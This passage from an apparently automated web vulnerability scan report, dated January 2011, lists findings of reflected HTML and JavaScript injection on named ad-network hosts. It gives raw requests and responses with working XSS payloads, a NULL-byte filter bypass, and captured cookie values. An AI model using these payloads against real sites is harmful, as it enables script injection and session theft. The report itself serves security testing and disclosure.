Connection: keep-alive
Content-Length: 11791

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscomc5152<a>ba673f094d9";
t.adSpace = "ros";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

4.747. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/NYDailyNewscom/ROS/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5700a<a>8b3bde82dda was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom/ROS5700a<a>8b3bde82dda/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:33 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:33 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11791

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom";
t.adSpace = "ros5700a<a>8b3bde82dda";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.748. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/NYDailyNewscom/ROS/tags.js/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d5b3<a>768ed47794e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom6d5b3<a>768ed47794e/ROS/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:19 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:19 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11791
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom6d5b3<a>768ed47794e";
t.adSpace = "ros";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

4.749. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/NYDailyNewscom/ROS/tags.js/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a669b<a>5da8e281ab5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom/ROSa669b<a>5da8e281ab5/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:17 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:17 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11791
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom";
t.adSpace = "rosa669b<a>5da8e281ab5";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.750. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 673af<a>2763f6655df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB673af<a>2763f6655df/Segment4/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:01:50 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:01:50 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11815

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb673af<a>2763f6655df";
t.adSpace = "segment4";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+
...[SNIP]...

4.751. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4262<a>a950a36cf07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB/Segment4f4262<a>a950a36cf07/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:32 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:32 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11815

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb";
t.adSpace = "segment4f4262<a>a950a36cf07";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.752. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d9af<a>a3ba9bc2a48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB6d9af<a>a3ba9bc2a48/Segment4/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:20 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:20 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11815
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb6d9af<a>a3ba9bc2a48";
t.adSpace = "segment4";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+
...[SNIP]...

4.753. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6819<a>1c7b7eb55e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB/Segment4d6819<a>1c7b7eb55e3/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:29 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:29 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11815
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb";
t.adSpace = "segment4d6819<a>1c7b7eb55e3";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.754. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/Zedo1AE/AudienceSelect/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2e7e<a>4be5b3a2cd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/Zedo1AEb2e7e<a>4be5b3a2cd7/AudienceSelect/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Sat, 29 Jan 2011 01:41:39 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Sat, 29 Jan 2011 02:41:39 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11795

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "zedo1aeb2e7e<a>4be5b3a2cd7";
t.adSpace = "audienceselect";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t
...[SNIP]...

4.755. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/Zedo1AE/AudienceSelect/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eafa6<a>4caa897812 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/Zedo1AE/AudienceSelecteafa6<a>4caa897812/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Sat, 29 Jan 2011 01:42:11 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Sat, 29 Jan 2011 02:42:11 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11794

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "zedo1ae";
t.adSpace = "audienceselecteafa6<a>4caa897812";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.756. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload %00af77a%3balert(1)//f494e559d40 was submitted in the cb parameter. This input was echoed as af77a;alert(1)//f494e559d40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded%00af77a%3balert(1)//f494e559d40&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; ses15=7477^8; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; put_1197=3297869551067506954; rdk=5804/7477; rdk2=0; ses2=7477^9; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:02:03 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 898
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 17:02:03 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Beauty,Education,Family and Parenting,Hobbies and Interests,Arts and Entertainment",
tagcloud : [
{ tag: "Beauty", weight: 79}
...[SNIP]...
496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};


try {
oz_onPixelsLoaded.af77a;alert(1)//f494e559d40(oo_profile);
} catch(ignore) {}

4.757. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae2f0%3balert(1)//6b60ca83c9 was submitted in the cb parameter. This input was echoed as ae2f0;alert(1)//6b60ca83c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoadedae2f0%3balert(1)//6b60ca83c9&pc=6272/9320 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi2=3174527.js^6^1296226121^1296232923&3138805.js^3^1296224077^1296232921&3178295.js^1^1296226112^1296226112; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%262372%3D1%262111%3D1%262494%3D1%262196%3D1%262189%3D1%263812%3D1%262374%3D1%263612%3D1; rdk2=0; ses2=7477^10&9320^2; rdk=6272/9320; rdk15=1; ses15=7477^10&9320^2; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 977
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sun, 27-Jan-2019 01:40:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Beauty,Dating and Relationships,Travel and Tourism High Affinity,Travel and Tourism,Swing Voters",
tagcloud : [
{ ta
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};


try {
oz_onPixelsLoadedae2f0;alert(1)//6b60ca83c9(oo_profile);
} catch(ignore) {}

4.758. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
